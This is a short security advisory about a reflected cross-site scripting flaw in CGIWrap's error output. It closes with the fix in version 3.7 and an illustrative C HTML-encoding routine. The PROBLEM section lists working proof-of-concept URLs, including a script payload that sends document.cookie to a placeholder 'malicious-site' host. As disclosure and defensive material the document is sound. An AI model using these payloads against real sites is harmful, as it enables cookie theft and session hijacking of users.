


CGIWrap - cookies can be stolen



COMMAND

    CGIWrap

SYSTEMS AFFECTED

    CGIWrap

PROBLEM

    Takagi Hiromitsu found the following. He found a cross-site scripting
    vulnerability in CGIWrap: the requested path is reflected unencoded in
    CGIWrap's error output, so cookies issued by the server on which CGIWrap
    is installed can be stolen. Please try to access the following URLs.

    Confirming the bug:

        http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
        http://www.unixtools.org/cgi-bin/cgiwrap/<S>
        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

    JavaScript code will be executed:

        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
        http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

    Stealing your cookies issued by www.unixtools.org, if any:

        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>

SOLUTION

    This has just been corrected in version 3.7, which has just been
    released:

        http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

    All error message output is now HTML encoded to prevent this problem.
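    As an added illustration of the fix described above (this is not CGIWrap's own code), a C routine that HTML-encodes untrusted request text before it is echoed into an error page, with the raw-splicing variant beside it for contrast; the error-page wording and the helper names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Escape the characters that let reflected text change HTML context.
 * Returns a malloc'd string (caller frees), NULL on allocation failure. */
char *html_encode(const char *in)
{
    char *out = malloc(strlen(in) * 6 + 1);   /* worst case: "&quot;" per byte */
    char *p = out; if (!out) return NULL;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t n = strlen(rep); memcpy(p, rep, n); p += n; }
        else *p++ = *in;
    }
    *p = '\0';
    return out;
}

/* Error body for a request path (wording assumed). encode=0 mimics the
 * pre-3.7 behaviour of splicing the path in raw; encode=1 is the fix. */
char *error_page(const char *path, int encode)
{
    const char *fmt = "<HTML><BODY>CGIWrap Error: script not found: %s</BODY></HTML>";
    char *safe = encode ? html_encode(path) : NULL;
    if (encode && !safe) return NULL;          /* never fall back to raw output */
    const char *shown = encode ? safe : path;
    size_t len = strlen(fmt) + strlen(shown) + 1;
    char *page = malloc(len);
    if (page) snprintf(page, len, fmt, shown);
    free(safe);
    return page;
}

/* Check helpers: does the page contain the path verbatim? does encoding match? */
int page_reflects_raw(const char *path, int encode)
{ char *pg = error_page(path, encode); int r = pg && strstr(pg, path) != NULL; free(pg); return r; }
int encodes_to(const char *in, const char *expected)
{ char *e = html_encode(in); int r = e && strcmp(e, expected) == 0; free(e); return r; }

int main(void)
{   /* constructed input, taken from the advisory's PoC URLs */
    char *bad = error_page("<S>TEST</S>", 0), *good = error_page("<S>TEST</S>", 1);
    printf("raw:     %s\nencoded: %s\n", bad ? bad : "(null)", good ? good : "(null)");
    free(bad); free(good); return 0;
}
```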

